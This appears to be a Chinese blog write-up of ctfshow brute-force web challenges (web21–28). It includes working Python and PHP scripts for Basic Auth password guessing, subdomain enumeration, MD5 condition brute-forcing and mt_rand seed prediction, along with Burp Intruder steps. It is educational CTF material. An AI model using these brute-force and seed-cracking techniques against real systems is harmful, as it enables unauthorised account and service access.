CTFshow_web入门_爆破

最新推荐文章于 2024-06-02 17:29:44 发布
最新推荐文章于 2024-06-02 17:29:44 发布
阅读量369 收藏 1
点赞数 1
分类专栏: CTFshow
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45882317/article/details/113036137
版权

0x00 web21

参考链接:tomcat 认证爆破之custom iterator使用

  • burpsuite大致步骤:
    ①抓包发送至intruder
    ②base64解码Authorization: Basic YWRtaW46YWFhYQ===》Authorization: Basic admin:aaaa
    ③添加为payload§YWRtaW46YWFhYQ==§,payload type设置为custom iterator【自定义迭代器】
    ④position 1中输入admin,position 2中输入:,position 3中导入字典
    ⑤payload Processing中加入规则:base64加密
    ⑥payload Encoding中取消勾选payload Encoding【防止==号被编码】

自定义迭代器可以自定义拼接方式,position的位置即为我们的拼接方式

  • Python脚本
import time
import requests
import base64

url = 'http://87e494f6-ff98-46f0-9f46-8d5e290b5816.chall.ctf.show/'

password = []
with open("1.txt", "r") as f:  
	while True:
	    data = f.readline()
	    if data:
	    	password.append(data)
	    else:
	      break

for p in password:
	strs = 'admin:'+ p[:-1]
	#['123456\n', 'shark63\n']
	print(strs)
	header={
		'Authorization':'Basic {}'.format(base64.b64encode(strs.encode('utf-8')).decode('utf-8'))
		#strs.encode('utf-8')).decode('utf-8')
		#是为了解决TypeError: a bytes-like object is required, not 'str'
		}
	rep =requests.get(url,headers=header)
	time.sleep(0.1) 
	if rep.status_code ==200:
		print(rep.text)
		break

0x01 web22

网上找了个脚本

#用法: python3 subdomain.py xxxx.com

import socket
import sys

domain = sys.argv[1] 

with open('subdomain.txt','r') as f:
    for i in f:
        i = i.strip()#去空
        subdomain = i + '.'+domain
        try:
            ip = socket.gethostbyname(subdomain)
            print("\033[1;32;40m %s \033[0m" % (subdomain+'   '+ip))
        except Exception as e:
            pass
  • 或者利用工具
    python sublist3r.py -d ctfer.com

结果:http://flag.ctfer.com/index.php

0x02 web23

  • 源代码:
error_reporting(0);

include('flag.php');
if(isset($_GET['token'])){
    $token = md5($_GET['token']);
    if(substr($token, 1,1)===substr($token, 14,1) && substr($token, 14,1) ===substr($token, 17,1)){
        if((intval(substr($token, 1,1))+intval(substr($token, 14,1))+substr($token, 17,1))/substr($token, 1,1)===intval(substr($token, 31,1))){
            echo $flag;
        }
    }
}else{
    highlight_file(__FILE__);

}
?>
  • 爆破出符合条件的md5值即可
  • 编写Python脚本【不熟练+intval函数 搞了好久】
import hashlib
dicts='1234567890qwertyuiopasdfghjklzxcvbnm'
strs=''

def getMd5(strs):
    md5Object = hashlib.md5()
    md5Object.update(strs.encode("utf-8"))
    md5 = md5Object.hexdigest()
    return md5

for i in dicts:
    for j in dicts:
        strs = i+j
        md5 = getMd5(strs)
        try:
            if (md5[1:2]==md5[14:15] and md5[14:15] ==md5[17:18]):
                if ((int(md5[1:2])+int(md5[14:15])+int(md5[17:18]))/int(md5[1:2])==int(md5[31:32])):
                    print(strs)
                    exit(0)        
        except Exception as e:
            pass
  • 看其他师傅的脚本,感觉用PHP写更方便点【复制粘贴就行】
<?php 
error_reporting(0); 
 
$a="asdfghjklqwertyuiopzxcvbnm1234567890";
for($i=0;$i<36;$i++){
    for($j=0;$j<36;$j++){
        $token=$a[$i].$a[$j];    
        $token = md5($token); 
        if(substr($token, 1,1)===substr($token, 14,1) && substr($token, 14,1) ===substr($token, 17,1)){ 
            if((intval(substr($token, 1,1))+intval(substr($token, 14,1))+substr($token, 17,1))/substr($token, 1,1)===intval(substr($token, 31,1))){ 
                echo $a[$i].$a[$j];
                exit(0);
            } 
        } 
    }
} 
?>

0x03 web24

error_reporting(0);
include("flag.php");
if(isset($_GET['r'])){
    $r = $_GET['r'];
    mt_srand(372619038);
    if(intval($r)===intval(mt_rand())){
        echo $flag;
    }
}
?>

PHP伪随机数:待整理

mt_scrand() //播种 Mersenne Twister 随机数生成器。
mt_rand() //生成随机数
简单来说mt_scrand()通过分发seed种子,然后种子有了后,靠mt_rand()生成随机数
当种子不变时,实际上生成的随机数是固定的。而这就是伪随机数漏洞

<?php
mt_srand(372619038);
echo(mt_rand());
?>
  • 运行得伪随机数1155388967,传r=1155388967即可

0x04 web25

error_reporting(0);
include("flag.php");
if(isset($_GET['r'])){
    $r = $_GET['r'];
    mt_srand(hexdec(substr(md5($flag), 0,8)));
    //hexdec() 函数把十六进制转换为十进制。
    $rand = intval($r)-intval(mt_rand());
    if((!$rand)){
        if($_COOKIE['token']==(mt_rand()+mt_rand())){
            echo $flag;
        }
    }else{
        echo $rand;//这里可以获得第一次的伪随机数
    }
}else{
    highlight_file(__FILE__);
    echo system('cat /proc/version');
}
  • 可以看出是通过第一个伪随机数获取种子,参考文章如web24,还有题目的hint1 hint2
  • ?r=0得第一个随机数的相反数
  • 下载php_mt_seed-4.0
  • 进入其目录后,bash中输入make【第一次使用要输入】
  • ./php_mt_seed-4.0 第一个随机数
  • 跑一会后可以出来一些值,抓包查看服务器版本得PHP7.3,故选择值为PHP7.3的种子
  • 再利用脚本
<?php
mt_srand(2471366460);
echo mt_rand()."\n";
echo (mt_rand()+mt_rand());
  • ?r=94231852 Cookie: token=3236254038即可

0x05 web26

  • 抓包burpsuite爆破密码即可,跑得pass=7758521
  • 有个非预期解,全为空也能连接成功,一开始没发现这一问题是因为返回的flag没有被调用,得在burpsuite的返回包中发现
  • {"success":true,"msg":"\u6570\u636e\u5e93\u8fde\u63a5\u6210\u529f","flag":"flag{eb9b4baf-d6db-487a-9007-fe4e49ab9f4a}"}

0x06 web27

  • 录取名单中找到姓名和缺少出生年月的身份证
  • 学生学籍信息查询系统 中爆破身份证
  • 得学号和密码,登录即可
  • 爆破用burpsuite即可
    爆破

0x07 web28

  • 看提示才知道是跑目录
  • 按提示爆破/0~100/0~100/
  • payload:/72/20/
  • 方法burpsuite
    Attack type选择Cluster bomb
    Payload set 1/2type选择number
    From:0,To:100,Step:1 其余默认即可
ScyLamb
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFshow 爆破 web24
Kradress的博客
10-28 427
根据提示 爆个???? <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-03 13:26:39 # @Last Modified by: h1xa # @Last Modified time: 2020-09-03 13:53:31 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); include("f
CTFshow--web入门--爆破
qq_46874275的博客
04-20 542
~目录~web21 Custom iterator(Base64加密)web22 子域名web23 MD5加密web24 web21 Custom iterator(Base64加密) 发现账号密码被Base64加密了,通过解密得知账号密码的形式为 账号:密码 抓包,添加$ 选择Payload type为Custom iterator,在Position1添加admin:(这里其实我们不知道账号为admin,正常爆破时间太长,看了大佬的wp知道账号为admin,我们就只爆破密码了) 在Position
ctfshow-web入门-爆破web21-web24
最新发布
Welcome To Myon'Blog !
06-02 650
(intval(substr($token, 1,1))+intval(substr($token, 14,1))+substr($token, 17,1))/substr($token, 1,1) === intval(substr($token, 31,1)) 将第 2、15 和 18 个字符转换为整数相加,再除以第 2 个字符的整数值,检查结果是否等于第 32 个字符的整数值;flag.ctf.show 页面无法访问(前面有一个查这个域名的 DNS 的 TXT信息的题也是有问题)
CTFSHOW-web入门-信息搜集,爆破,命令执行
Yb_140的博客
02-19 4917
目录 Web入门 信息搜集 web3 web4 web5 web6 web7 web8 web9 web10 web11 web12 web13 web14 web15 web16 web17 web18 web19 web20 爆破 web21 web22 web23 web24 web25 web26 web27 web28 命令执行 web29 web30 web31 web32 web33 web34 web35 web36
CTFShow-Web入门
weixin_58546222的博客
12-15 659
CTFShow爆破解题思路
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web185 正则爆破脚本
10-21
ctfshow web185 正则爆破脚本,以true拼接形成数字,实现ascii代替数字、字母和特殊符号
ctfshow web240 insert 爆破表名
10-21
ctfshow web240 insert 爆破表名
Blasting_dictionary,爆破字典
07-20
压缩文件包含了各种类型的密码,用户名,目录,及各种服务器类型的源代码目录结构,多种组合方式。渗透字典,数据库地址,top100W字典,美国人字典等等。
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
ctfshow web系列
RealIiikun的博客
04-07 948
源代码要求v1为为字母,v2为数字,并且v1与v2的md5值相同md5漏洞介绍:PHP在处理字符串时,它把每一个以“0E”开头的哈希值都解释为0所以只要v1与v2的md5值以0E开头即可。常见的0e开头的MD5和原值QNKCDZO240610708。
CTF-Web24(涉及PHP代码审计,较简单)
→_→
09-26 544
24.FALSE 分析: PHP函数 isset():检测变量是否设置 只能用于变量,传递任何其它参数都将造成解析错误。若想检测常量是否已设置,可使用 defined() 函数 格式: isset ( mixed var [, mixed var [, ...]] )     若变量不存在则返回 FALSE    若变量存在且其值为NULL,也返回 FALSE    若变量存在且值不为NULL,则返回 TURE     同时检查多个变量时,每个单项都符合上一条要求...
CTFshow_萌新(web
果粒程
01-09 492
CTFshow_萌新(web
CTFshow_web入门_爆破(web21-28)
monster663的博客
01-22 2632
ctfshow系列持续更新 web25有点麻烦,工具不齐,暂时没解 web21 点开环境直接问用户名和密码 附件里面有个密码的zip 拿去burp跑 用户名就默认猜个admin 注意一下base64加密和关掉默认的url编码 跑到密码为shark63 直接看到flag web22 子域名爆破 用各种网址都能查吧 https://x.threatbook.cn/这个是需要登入的 盲猜的话也容易知道猜个flag 访问http://flag.ctfer.com/index.php得flag web23 部
ctfshow web 488,489(偶尔更新)
weixin_53747083的博客
03-31 3868
记录一下小编花了一个多小时才做出来的一道《入门题》 收获挺多的,记录一下 打开 之后,就是这么个页面,结合前两道题的经验,直接读取index.php,也就是../index if($user){ templateUtil::render('index',array('username'=>$username)); }else{ templateUtil::render('error',array('username'=>$username)); } 这里是
ctfshow-Web入门-sherlock
m0_58327783的博客
04-13 488
信息泄露可以参考https://blog.csdn.net/a597934448/article/details/105431367。
(补)ctfshow中期测评
Npceer-一位网安初学者的博客
09-12 249
懒B来补发一下博客 之前写了存在草稿箱 过几天在发cms审计复现吧web487web488web488(困了 明天补) web487 目录穿越 直接action=1看报错 然后猜action=flag web488 因为是写到后面才补的博客 所以没留下什么 就剩两张图片了 简单的盲注脚本 脚本找不到了 回过头写wp 看看其他大佬的博客 还是能学到很多的 Y4giegie的sql注法 直接外带 ?action=check&username=1') union select flag from fla
ctfshow web入门 web57
Firebasky的博客
09-13 1974
这道题是之后群主直接放了payload 其实比较困难,下面就是自己的分析 源代码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-08 01:02:56 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ // .
ctfshow-web入门爆破
08-30
在ctfshow-web入门爆破中,可以使用正则爆破脚本来实现对目录的暴力破解。该脚本会将true拼接成数字,并以此来替换ASCII码中的数字、字母和特殊符号,以实现对目录的爆破。通过暴力破解目录/0-100/0-100/看返回...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值